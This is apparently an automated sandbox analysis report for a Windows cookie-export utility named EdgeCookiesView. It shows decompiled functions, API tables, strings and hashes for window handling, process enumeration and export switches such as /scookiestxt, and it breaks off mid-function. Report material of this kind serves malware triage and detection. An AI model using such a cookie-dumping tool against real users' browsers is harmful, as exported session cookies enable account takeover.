				void* _t69;
				void* _t75;
				void* _t97;
				signed int _t105;
				void* _t108;
				intOrPtr _t115;
				signed char _t120;
				signed int _t124;
				intOrPtr _t129;
				intOrPtr _t131;
				intOrPtr* _t134;
				signed int _t136;
				void* _t139;

				_t129 = __ecx;
				_t118 = _a4;
				_t139 = _t118 - 0x402;
				_v8 = __ecx;
				if(_t139 > 0) {
					_t60 = _t118 - 0x415;
					__eflags = _t60;
					if(_t60 == 0) {
						E0040A459(__ecx);
						_t132 = _t129;
						L31:
						__eflags = 0;
						E0040A1DC(0, _t118, _t132, 0);
						L32:
						_t64 =  *((intOrPtr*)(_t129 + 0x6a0));
						if(_t64 != 0 && _a4 == _t64) {
							_t127 = _a12;
							_t120 =  *(_a12 + 0xc);
							_t148 = _t120 & 0x00000008;
							_t66 =  *((intOrPtr*)(_t129 + 0x69c));
							if((_t120 & 0x00000008) == 0) {
								__eflags = _t120 & 0x00000040;
								if((_t120 & 0x00000040) != 0) {
									 *0x412c2c =  *0x412c2c & 0x00000000;
									__eflags =  *0x412c2c;
									E004077CB(_t66);
								}
							} else {
								E0040990D(_t66, _t148, _t127);
							}
						}
						return E00401B1E(_t129, _a4, _a8, _a12);
					}
					_t69 = _t60 - 1;
					__eflags = _t69;
					if(_t69 == 0) {
						_t134 = __ecx + 0x69c;
						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x68))();
						_t118 =  *_t134;
						 *((intOrPtr*)( *((intOrPtr*)( *_t134)) + 0x80))(0);
						L22:
						_t132 = _t129;
						E0040A3BF(_t129);
						goto L31;
					}
					_t75 = _t69 - 0x12;
					__eflags = _t75;
					if(__eflags == 0) {
						E004077CB( *((intOrPtr*)(__ecx + 0x69c)));
					} else {
						__eflags = _t75 - 0x41;
						if(__eflags == 0) {
							memcpy( *((intOrPtr*)(__ecx + 0x698)) + 0x228, __ecx + 0x744, 0x200c);
							E0040B00A(_t129);
						}
					}
					goto L32;
				}
				if(_t139 == 0) {
					_t38 = __ecx + 0x280;
					 *_t38 =  *(__ecx + 0x280) & 0x00000000;
					__eflags =  *_t38;
					goto L22;
				}
				if(_t118 == 6) {
					__eflags = _a8 - 1;
					if(__eflags == 0) {
						PostMessageW( *(__ecx + 0x208), 0x428, 0, 0);
					}
					goto L32;
				}
				if(_t118 == 0xc) {
					__eflags = E0040546C(_a12, L"EdgeCookiesView");
					if(__eflags == 0) {
						goto L32;
					}
					return 0;
				}
				if(_t118 == 0x20) {
					__eflags = _a8 -  *((intOrPtr*)(__ecx + 0x214));
					if(__eflags != 0) {
						goto L32;
					}
					SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
					return 1;
				}
				if(_t118 == 0x2b) {
					_t115 = _a12;
					__eflags =  *((intOrPtr*)(_t115 + 0x14)) -  *((intOrPtr*)(__ecx + 0x214));
					if(__eflags != 0) {
						goto L32;
					}
					__eflags =  *(__ecx + 0x694);
					if(__eflags != 0) {
						L14:
						SetBkMode( *(_t115 + 0x18), 1);
						SetTextColor( *(_t115 + 0x18), 0xff0000);
						_t97 = SelectObject( *(_t115 + 0x18),  *(_t129 + 0x694));
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t131 = _a12;
						_v28 = 0x14;
						_v20 = 5;
						DrawTextExW( *(_t131 + 0x18), _v8 + 0x492, 0xffffffff, _t131 + 0x1c, 0x24,  &_v28);
						SelectObject( *(_t131 + 0x18), _t97);
						_t129 = _v8;
						goto L32;
					}
					_t105 = GetDeviceCaps( *(_t115 + 0x18), 0x5a);
					asm("cdq");
					_t124 = 0x60;
					_t136 = _t105 * 0xe / _t124;
					_t108 =  *(__ecx + 0x694);
					__eflags = _t108;
					if(__eflags != 0) {
						DeleteObject(_t108);
						_t16 = __ecx + 0x694;
						 *_t16 =  *(__ecx + 0x694) & 0x00000000;
						__eflags =  *_t16;
					}
					 *(_t129 + 0x694) = E004058D4(_t136);
					goto L14;
				} else {
					if(_t118 == 0x7b) {
						_t126 = _a8;
						if(_a8 ==  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x69c)) + 0x2ac))) {
							E0040B607(__ecx, _t126);
						}
					}
					goto L32;
				}
			}

0x0040b81c
0x0040b81e
0x0040b826
0x0040b828
0x0040b82b
0x0040b9cd
0x0040b9cd
0x0040b9d2
0x0040ba34
0x0040ba39
0x0040ba3b
0x0040ba3b
0x0040ba3d
0x0040ba42
0x0040ba42
0x0040ba4a
0x0040ba51
0x0040ba54
0x0040ba57
0x0040ba5a
0x0040ba60
0x0040ba6c
0x0040ba6f
0x0040ba71
0x0040ba71
0x0040ba78
0x0040ba78
0x0040ba62
0x0040ba65
0x0040ba65
0x0040ba60
0x00000000
0x0040ba88
0x0040b9d4
0x0040b9d4
0x0040b9d5
0x0040ba17
0x0040ba21
0x0040ba24
0x0040ba2a
0x0040b9c2
0x0040b9c2
0x0040b9c4
0x00000000
0x0040b9c4
0x0040b9d7
0x0040b9d7
0x0040b9da
0x0040ba10
0x0040b9dc
0x0040b9dc
0x0040b9df
0x0040b9f9
0x0040ba03
0x0040ba03
0x0040b9df
0x00000000
0x0040b9da
0x0040b831
0x0040b9bb
0x0040b9bb
0x0040b9bb
0x00000000
0x0040b9bb
0x0040b83a
0x0040b996
0x0040b99b
0x0040b9b0
0x0040b9b0
0x00000000
0x0040b99b
0x0040b843
0x0040b985
0x0040b989
0x00000000
0x00000000
0x00000000
0x0040b98f
0x0040b84c
0x0040b94c
0x0040b952
0x00000000
0x00000000
0x0040b96a
0x00000000
0x0040b972
0x0040b855
0x0040b881
0x0040b887
0x0040b88d
0x00000000
0x00000000
0x0040b893
0x0040b89a
0x0040b8d7
0x0040b8dc
0x0040b8ea
0x0040b8ff
0x0040b908
0x0040b909
0x0040b90a
0x0040b90b
0x0040b90c
0x0040b927
0x0040b92e
0x0040b935
0x0040b93f
0x0040b941
0x00000000
0x0040b941
0x0040b8a1
0x0040b8aa
0x0040b8ad
0x0040b8b0
0x0040b8b2
0x0040b8b8
0x0040b8ba
0x0040b8bd
0x0040b8c3
0x0040b8c3
0x0040b8c3
0x0040b8c3
0x0040b8d1
0x00000000
0x0040b857
0x0040b85a
0x0040b866
0x0040b86f
0x0040b877
0x0040b877
0x0040b86f
0x00000000
0x0040b85a

APIs

GetDeviceCaps.GDI32(?,0000005A), ref: 0040B8A1
DeleteObject.GDI32(00000000), ref: 0040B8BD
SetBkMode.GDI32(?,00000001), ref: 0040B8DC
SetTextColor.GDI32(?,00FF0000), ref: 0040B8EA
SelectObject.GDI32(?,00000000), ref: 0040B8FF
DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 0040B935
SelectObject.GDI32(00000014,00000000), ref: 0040B93F

Part of subcall function 0040B607: GetCursorPos.USER32(?), ref: 0040B614
Part of subcall function 0040B607: GetSubMenu.USER32 ref: 0040B622
Part of subcall function 0040B607: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B64F

GetModuleHandleW.KERNEL32(00000000), ref: 0040B95A
LoadCursorW.USER32(00000000,00000067), ref: 0040B963
SetCursor.USER32(00000000), ref: 0040B96A
PostMessageW.USER32(?,00000428,00000000,00000000), ref: 0040B9B0
memcpy.MSVCRT ref: 0040B9F9

Strings

EdgeCookiesView, xrefs: 0040B978

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: CursorObject$MenuSelectText$CapsColorDeleteDeviceDrawHandleLoadMessageModeModulePopupPostTrackmemcpy
String ID: EdgeCookiesView
API String ID: 1858646182-2656830938
Opcode ID: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
Instruction ID: ea2783da8998489939a316812c4387a05210a4ff33434ae7ee18e9d7754e5edd
Opcode Fuzzy Hash: d26675a218d700badc6a675dd830738741115ad42cbdd2e9d5c3fda0172277b6
Instruction Fuzzy Hash: 4161BD71310205ABDB24AF64CC85BAAB7A5FF44310F10413AFA09B76E1D778AC618BDD

Uniqueness

Uniqueness Score: -1.00%

Function 0040CA5A, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CA5A() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x413260 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryW(L"psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameW");
					 *0x4128e8 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x4128e0 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExW");
							 *0x4128d8 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x412b0c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x4128e4 = _t2;
									if(_t2 != 0) {
										 *0x413260 = 1;
									}
								}
							}
						}
					}
					if( *0x413260 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}

0x0040ca61
0x0040caf1
0x0040caf1
0x0040ca6d
0x0040ca73
0x0040ca77
0x0040caf0
0x00000000
0x0040ca79
0x0040ca86
0x0040ca8a
0x0040ca8f
0x0040ca97
0x0040ca9b
0x0040caa0
0x0040caa8
0x0040caac
0x0040cab1
0x0040cab9
0x0040cabd
0x0040cac2
0x0040caca
0x0040cace
0x0040cad3
0x0040cad5
0x0040cad5
0x0040cad3
0x0040cac2
0x0040cab1
0x0040caa0
0x0040cae7
0x0040caea
0x0040caea
0x00000000
0x0040cae7

APIs

LoadLibraryW.KERNEL32(psapi.dll,?,0040C284), ref: 0040CA6D
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040CA86
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040CA97
GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0040CAA8
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040CAB9
GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040CACA
FreeLibrary.KERNEL32(00000000), ref: 0040CAEA

Strings

EnumProcesses, xrefs: 0040CAB3
psapi.dll, xrefs: 0040CA68
GetModuleBaseNameW, xrefs: 0040CA80
GetModuleFileNameExW, xrefs: 0040CAA2
EnumProcessModules, xrefs: 0040CA91
GetModuleInformation, xrefs: 0040CAC4

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 2449869053-70141382
Opcode ID: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
Instruction ID: 77b1fe70fa67b5f7b7b6e6a9f8f9c1ad54eab79ee609772bc806a346005bb9be
Opcode Fuzzy Hash: 1fa1d9a519be2ed58e0af9f07189630cf09ef9daca44d3ebf756e2d3c1d78af6
Instruction Fuzzy Hash: D101487078120ADDD751EB68AE84BAB3AF49B44B41B144237E405F12D4DBFC9882DF6C

Uniqueness

Uniqueness Score: -1.00%

Function 0040BCAA, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0040BCAA(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(L"/shtml");
				L0040E03E();
				if(__eax != 0) {
					_push(L"/sverhtml");
					L0040E03E();
					if(__eax != 0) {
						_push(L"/sxml");
						L0040E03E();
						if(__eax != 0) {
							_push(L"/stab");
							L0040E03E();
							if(__eax != 0) {
								_push(L"/sjson");
								L0040E03E();
								if(__eax != 0) {
									_push(L"/scomma");
									L0040E03E();
									if(__eax != 0) {
										_push(L"/scookiestxt");
										L0040E03E();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 4;
										return _t5;
									}
								} else {
									_t6 = 3;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 7;
							return _t8;
						}
					} else {
						_t9 = 6;
						return _t9;
					}
				} else {
					_t10 = 5;
					return _t10;
				}
			}

0x0040bcab
0x0040bcb0
0x0040bcb9
0x0040bcc0
0x0040bcc5
0x0040bcce
0x0040bcd5
0x0040bcda
0x0040bce3
0x0040bcea
0x0040bcef
0x0040bcf8
0x0040bcff
0x0040bd04
0x0040bd0d
0x0040bd14
0x0040bd19
0x0040bd22
0x0040bd29
0x0040bd2e
0x0040bd35
0x0040bd3f
0x0040bd24
0x0040bd26
0x0040bd27
0x0040bd27
0x0040bd0f
0x0040bd11
0x0040bd12
0x0040bd12
0x0040bcfa
0x0040bcfc
0x0040bcfd
0x0040bcfd
0x0040bce5
0x0040bce7
0x0040bce8
0x0040bce8
0x0040bcd0
0x0040bcd2
0x0040bcd3
0x0040bcd3
0x0040bcbb
0x0040bcbd
0x0040bcbe
0x0040bcbe

APIs

_wcsicmp.MSVCRT ref: 0040BCB0
_wcsicmp.MSVCRT ref: 0040BCC5

Strings

/scookiestxt, xrefs: 0040BD29
/stab, xrefs: 0040BCEA
/sjson, xrefs: 0040BCFF
/shtml, xrefs: 0040BCAB
/sxml, xrefs: 0040BCD5
/sverhtml, xrefs: 0040BCC0
/scomma, xrefs: 0040BD14

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmp
String ID: /scomma$/scookiestxt$/shtml$/sjson$/stab$/sverhtml$/sxml
API String ID: 2081463915-1797186745
Opcode ID: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
Instruction ID: 8371893b6cdf142ed748882e6751911a4291a5e673982fbb48e018f7079fe289
Opcode Fuzzy Hash: 05ae40105c61c941a681a593c220de42bbbaddc207cdccefb85796f2d6d1dd43
Instruction Fuzzy Hash: 7C010C3228936569F9282577AD07B870649CB51BBAF30056FF924E81C1EFED8481605C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9D6, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C9D6() {
				void* _t1;
				_Unknown_base(*)()* _t2;
				struct HINSTANCE__* _t4;

				if( *0x41325c != 0) {
					return _t1;
				}
				_t2 = GetModuleHandleW(L"kernel32.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L9:
					return _t2;
				}
				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
				 *0x4128dc = _t2;
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t4, "Module32First");
					 *0x4128d4 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "Module32Next");
						 *0x4128d0 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "Process32First");
							 *0x412664 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "Process32Next");
								 *0x4128c8 = _t2;
								if(_t2 != 0) {
									 *0x41325c = 1;
								}
							}
						}
					}
				}
				goto L9;
			}

0x0040c9dd
0x0040ca59
0x0040ca59
0x0040c9e5
0x0040c9eb
0x0040c9ef
0x0040ca58
0x00000000
0x0040ca58
0x0040c9fe
0x0040ca02
0x0040ca07
0x0040ca0f
0x0040ca13
0x0040ca18
0x0040ca20
0x0040ca24
0x0040ca29
0x0040ca31
0x0040ca35
0x0040ca3a
0x0040ca42
0x0040ca46
0x0040ca4b
0x0040ca4d
0x0040ca4d
0x0040ca4b
0x0040ca3a
0x0040ca29
0x0040ca18
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,0040C28B), ref: 0040C9E5
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040C9FE
GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040CA0F
GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040CA20
GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040CA31
GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040CA42

Strings

Module32Next, xrefs: 0040CA1A
CreateToolhelp32Snapshot, xrefs: 0040C9F8
Process32First, xrefs: 0040CA2B
Process32Next, xrefs: 0040CA3C
Module32First, xrefs: 0040CA09
kernel32.dll, xrefs: 0040C9E0

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$HandleModule
String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
API String ID: 667068680-3953557276
Opcode ID: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
Instruction ID: 7b85a6ede3351e87d48595370c2c99752d77d7c7be9155cf3b7c884c9e88c84f
Opcode Fuzzy Hash: 787fe15a15212cfc69d8e0716052563e5db82a9012d8f708c1cbc5174a3f1a7a
Instruction Fuzzy Hash: B2F06230651359D9C720EB256E80BEB2BE45785B40F149237E404F22D4EBBC84968FAC

Uniqueness

Uniqueness Score: -1.00%

Function 004071D1, Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004071D1(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E004057D1(_a4);
				if(_t3 != 0) {
					wcscpy(0x412c38, _a4);
					wcscpy(0x412e48, L"general");
					_t6 = GetPrivateProfileIntW(0x412e48, L"rtl", 0, 0x412c38);
					asm("sbb eax, eax");
					 *0x412ecc =  ~(_t6 - 1) + 1;
					E00406D4D(0x412ed0, L"charset", 0x3f);
					E00406D4D(0x412f50, L"TranslatorName", 0x3f);
					return E00406D4D(0x412fd0, L"TranslatorURL", 0xff);
				}
				return _t3;
			}

0x004071d5
0x004071dd
0x004071eb
0x004071fb
0x0040720c
0x00407215
0x00407224
0x00407229
0x0040723a
0x00000000
0x00407257
0x00407258

APIs

Part of subcall function 004057D1: GetFileAttributesW.KERNELBASE(?,004071DA,?,00407291,00000000,?,00000000,00000208,?), ref: 004057D5

wcscpy.MSVCRT ref: 004071EB
wcscpy.MSVCRT ref: 004071FB
GetPrivateProfileIntW.KERNEL32 ref: 0040720C

Part of subcall function 00406D4D: GetPrivateProfileStringW.KERNEL32 ref: 00406D69

Strings

H.A, xrefs: 004071F5
TranslatorURL, xrefs: 00407244
P/A, xrefs: 00407235
8,A, xrefs: 004071E5
TranslatorName, xrefs: 00407230
rtl, xrefs: 00407206
general, xrefs: 004071F0
charset, xrefs: 0040721A

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfilewcscpy$AttributesFileString
String ID: 8,A$H.A$P/A$TranslatorName$TranslatorURL$charset$general$rtl
API String ID: 3176057301-819253090
Opcode ID: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
Instruction ID: f115d196d4af7e8601c57319c09dc176dc9760a1553b0771dc73547d8c0c0b20
Opcode Fuzzy Hash: 10369fd3d997d831964a271d77f9b9efc46b858f8e3afda9947d28c379b07417
Instruction Fuzzy Hash: 96F0CD32FC036172C62176225E06F6B25148F91B15F15447BBC08FA5C2D6FC08669A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5AB, Relevance: 18.1, APIs: 12, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A5AB(void* __esi) {
				struct HDWP__* _v8;
				signed int _v12;
				int _v16;
				int _v20;
				intOrPtr _v24;
				struct tagRECT _v40;
				intOrPtr _v44;
				struct tagPOINT _v56;
				void* _t53;
				int _t99;
				void* _t101;

				_t101 = __esi;
				if( *((intOrPtr*)(__esi + 0x244)) != 0) {
					GetClientRect( *(__esi + 0x208),  &_v40);
					GetWindowRect( *(__esi + 0x214),  &_v56);
					_v20 = _v44 - _v56.y + 1;
					GetWindowRect( *(__esi + 0x218),  &_v56);
					_v16 = _v40.right - _v40.left;
					_t99 = _v44 - _v56.y + 1;
					_v24 = _v40.bottom - _v40.top;
					_v12 = 0xdc;
					if( *(__esi + 0x6d4) != 0) {
						GetWindowRect(GetDlgItem( *(__esi + 0x6d4), 0x40d),  &_v56);
						MapWindowPoints(0,  *(__esi + 0x6d4),  &_v56, 2);
						_v12 = _v44 + 6;
					}
					if( *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x698)) + 0x224)) == 0) {
						_v12 = _v12 & 0x00000000;
					}
					_v8 = BeginDeferWindowPos(4);
					DeferWindowPos(_v8,  *(_t101 + 0x218), 0, 0, 0, _v16, _t99, 4);
					DeferWindowPos(_v8,  *(_t101 + 0x214), 0, 0, _v40.bottom - _v20 + 1, _v16, _v20, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(_t101 + 0x69c)) + 0x2ac), 0, 0, _v12 + _t99, _v16, _v24 - _v12 - _t99 - _v20, 4);
					DeferWindowPos(_v8,  *(_t101 + 0x6d4), 0, 0, _t99, _v16, _v12, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t53;
			}

0x0040a5ab
0x0040a5b8
0x0040a5ca
0x0040a5e0
0x0040a5e9
0x0040a5f6
0x0040a604
0x0040a60d
0x0040a615
0x0040a618
0x0040a61f
0x0040a637
0x0040a647
0x0040a653
0x0040a653
0x0040a663
0x0040a665
0x0040a665
0x0040a67d
0x0040a68e
0x0040a6ad
0x0040a6d8
0x0040a6f0
0x00000000
0x0040a6fc
0x0040a6fe

APIs

GetClientRect.USER32 ref: 0040A5CA
GetWindowRect.USER32 ref: 0040A5E0
GetWindowRect.USER32 ref: 0040A5F6
GetDlgItem.USER32 ref: 0040A630
GetWindowRect.USER32 ref: 0040A637
MapWindowPoints.USER32 ref: 0040A647
BeginDeferWindowPos.USER32 ref: 0040A66B
DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A68E
DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A6AD
DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 0040A6D8
DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 0040A6F0
EndDeferWindowPos.USER32(?), ref: 0040A6F5

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Defer$Rect$BeginClientItemPoints
String ID:
API String ID: 552707033-0
Opcode ID: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
Instruction ID: 1e8564dccfd76f42bf82a6a58439150b57488fc8b3b7f8ee37cc979cf164ca84
Opcode Fuzzy Hash: deaf485977630ebd07cd0c8abf75c15e3b76596b5d82e0fed9d2ca39a13f5f3c
Instruction Fuzzy Hash: 1E41B571900209FFDB11DBA8DD89FEEBBB6EB48304F100465E655B61A0C7716A549B14

Uniqueness

Uniqueness Score: -1.00%

Function 00403899, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101
timewindowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403899(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				void* __esi;
				struct HDWP__* _t27;
				intOrPtr* _t51;
				RECT* _t56;

				_push(__ecx);
				_t51 = __ecx;
				if(_a4 != 0x18) {
					L4:
					if(_a4 == 2) {
						KillTimer( *(_t51 + 0x10), 0x41);
					}
					if(_a4 != 0x113) {
						L11:
						if(_a4 == 5) {
							_t27 = BeginDeferWindowPos(5);
							_t56 = _t51 + 0x40;
							_v8 = _t27;
							E004017E9(_t56, _t27, 0x40b, 0, 0, 1);
							E004017E9(_t56, _v8, 0x40c, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40e, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40f, 1, 0, 0);
							E004017E9(_t56, _v8, 0x40d, 0, 0, 1);
							EndDeferWindowPos(_v8);
							InvalidateRect( *(_t56 + 0x10), _t56, 1);
						}
						goto L13;
					} else {
						if(_a8 != 0x41 ||  *((intOrPtr*)(_t51 + 0x78)) == 0 || GetTickCount() -  *((intOrPtr*)(_t51 + 0x7c)) <= 0x1f4) {
							L13:
							return E004015CE(_t51, _a4, _a8, _a12);
						} else {
							 *((intOrPtr*)(_t51 + 0x78)) = 0;
							 *((intOrPtr*)( *_t51 + 4))(0);
							SendMessageW(GetParent( *(_t51 + 0x10)), 0x469, 0, 0);
							goto L11;
						}
					}
				}
				if(_a8 == 0) {
					KillTimer( *(__ecx + 0x10), 0x41);
					goto L4;
				}
				SetTimer( *(__ecx + 0x10), 0x41, 0x64, 0);
				goto L13;
			}

0x0040389c
0x004038ac
0x004038ae
0x004038cf
0x004038d3
0x004038da
0x004038da
0x004038e3
0x0040392e
0x00403932
0x00403936
0x00403945
0x00403949
0x0040394c
0x0040395d
0x0040396e
0x0040397f
0x00403990
0x00403998
0x004039a4
0x004039a4
0x00000000
0x004038e5
0x004038e9
0x004039aa
0x004039be
0x0040390c
0x00403911
0x00403914
0x00403928
0x00000000
0x00403928
0x004038e9
0x004038e3
0x004038b3
0x004038cd
0x00000000
0x004038cd
0x004038bd
0x00000000

APIs

SetTimer.USER32(?,00000041,00000064,00000000), ref: 004038BD
KillTimer.USER32(?,00000041), ref: 004038CD
KillTimer.USER32(?,00000041), ref: 004038DA
GetTickCount.KERNEL32 ref: 004038F8
GetParent.USER32(?), ref: 00403921
SendMessageW.USER32(00000000), ref: 00403928
BeginDeferWindowPos.USER32 ref: 00403936
EndDeferWindowPos.USER32(?), ref: 00403998
InvalidateRect.USER32(?,?,00000001), ref: 004039A4

Strings

A, xrefs: 004038E5

Memory Dump Source

Source File: 00000009.00000002.280202091.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.280191131.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280225522.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.280236044.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.280242741.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
String ID: A
API String ID: 2892645895-3554254475
Opcode ID: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
Instruction ID: 0871a1714dd068d8f738543c02bb6dd68063c1354b3792716d758cdabfe2902c
Opcode Fuzzy Hash: 885c7b7efeaa64dd561d1061219ec06417023ed24bc0a52f7ba4a118946187d8
Instruction Fuzzy Hash: 2B315DB1650608BFEB205F60CC86E9ABAADFB04745F00803AF305754E0C7B69E90DA98

Uniqueness

Uniqueness Score: -1.00%

Function 0040D7CE, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040D7CE(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, long long* _a12, long long _a16) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void _v1538;
				char _v1540;
				void* _t39;
				intOrPtr* _t50;
				void* _t61;

				_t50 = __ecx;
				_push(0x1fe);
				_push(0);
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					_v1540 = 0;
					memset( &_v1538, ??, ??);
					_v1028 = 0;
					memset( &_v1026, 0, 0x1fe);
					_v516 = 0;
